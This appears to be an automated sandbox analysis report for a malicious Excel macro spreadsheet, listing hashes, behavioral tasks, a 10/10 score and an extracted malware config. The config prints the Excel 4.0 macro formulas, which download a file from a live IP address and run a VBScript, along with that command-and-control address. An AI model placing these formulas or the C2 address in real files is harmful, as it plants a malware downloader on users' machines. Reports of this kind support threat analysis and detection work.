dc85dc4b1e2b3fb6b6dfea606dbcf9e6 | Triage

Submit
Reports

Overview

overview

Static

static

dc85dc4b1e...6.xlsm

windows7-x64

dc85dc4b1e...6.xlsm

windows10-2004-x64

Sharing

Static task

static1

Behavioral task

behavioral1

Sample

dc85dc4b1e2b3fb6b6dfea606dbcf9e6.xlsm

Resource

win7-20231215-en

windows7-x64

7 signatures

150 seconds

Behavioral task

behavioral2

Sample

dc85dc4b1e2b3fb6b6dfea606dbcf9e6.xlsm

Resource

win10v2004-20231215-en

windows10-2004-x64

8 signatures

150 seconds

General

Target

dc85dc4b1e2b3fb6b6dfea606dbcf9e6
Size

6KB
MD5

dc85dc4b1e2b3fb6b6dfea606dbcf9e6
SHA1

a8dd1f2bfe429ac008a6c1648d0b74ce35f7090f
SHA256

28c31084711a9adfc4abe64c2392e565f2cb4f4832ebc81d20ac21e9b2a5c5c1
SHA512

d53ef8e621b51bcd04e1f5db7df7b8e87a550f3537cd4d6e089a0fe0645ae396d3ae768983b023a7a655052d1b7701ed3bc1f3b4f064c5e9cca62219f8eac7da
SSDEEP

192:NDSiuSwbrA2OmmfRD8UhHFBFYulb98yei+f:NVuNM2wx1FYwb98ye3

Score

10^/10

xlm

Malware Config

Extracted

Rule

Excel 4.0 XLM Macro

C2

http://46.17.98.187/index.php

http://google.com/index.php

Attributes

formulas
=CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0) =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0) =EXEC("wscript C:\zer\spp.vbs") =HALT()

Signatures

Files

dc85dc4b1e2b3fb6b6dfea606dbcf9e6
.xlsm office2007

© 2018-2025

Terms | Privacy